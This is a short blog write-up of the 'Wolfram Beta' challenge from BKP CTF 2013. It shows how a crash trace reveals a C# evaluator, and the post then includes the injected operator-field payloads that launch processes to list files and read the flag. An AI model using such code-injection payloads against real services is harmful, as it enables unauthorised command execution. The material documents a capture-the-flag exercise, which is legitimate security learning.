Wolfram Beta is a calculator service running on 54.218.12.97 34567.
[ctf@renorobert BKPCTF]$ nc 54.218.12.97 34567 Wolfram Beta - BkP CTF 2013 Team Wolfram Beta is a great calculator. just put in a number at the prompt then put in the operator then finally the second number and the calculation will be done INSTANTLY no accounts necessacary, unlike some of our competition! first num: 1 operator: + second num: 2 Thinking... ...... Done Thinking! 3Triggering a crash gives valuable information about the service. Here is what division by zero gave:
first num: 1 operator: / second num: 0 Thinking... ....... Done Thinking! {interactive}(1,3): error CS0020: Division by constant zero Unhandled Exception: System.ArgumentException: The expression did not set a result at Mono.CSharp.Evaluator.Evaluate (System.String input) [0x00000] in <filename unknown>:0 at wolfram_beta.MainClass.ReplCalculator () [0x00000] in <filename unknown>:0 at wolfram_beta.MainClass.Main (System.String[] args) [0x00000] in <filename unknown>:0 [ERROR] FATAL UNHANDLED EXCEPTION: System.ArgumentException: The expression did not set a result at Mono.CSharp.Evaluator.Evaluate (System.String input) [0x00000] in <filename unknown>:0 at wolfram_beta.MainClass.ReplCalculator () [0x00000] in <filename unknown>:0 at wolfram_beta.MainClass.Main (System.String[] args) [0x00000] in <filename unknown>:0An Unhandled Exception is triggered. We can see the line Mono.CSharp.Evaluator.Evaluate. Now we know that the service is written in CSharp. The user input is evaluated as Mono.CSharp.Evaluator.Evaluate (System.String input). This results in code injection vulnerability
first num: 1 operator: +3;System.Diagnostics.Process proc=new System.Diagnostics.Process();proc.StartInfo.FileName="ls";proc.StartInfo.Arguments="-a";proc.Start(); second num: 5 Thinking... . Done Thinking! 5 first num: . .. .bash_history .bash_logout .bashrc .profile b flag
first num: 1 operator: +3;System.Diagnostics.Process proc=new System.Diagnostics.Process();proc.StartInfo.FileName="cat";proc.StartInfo.Arguments="flag";proc.Start(); second num: 5 Thinking... .. Done Thinking! 5 first num: at_least_its_not_a_python_jailFlag for the challenge is at_least_its_not_a_python_jail
No comments :
Post a Comment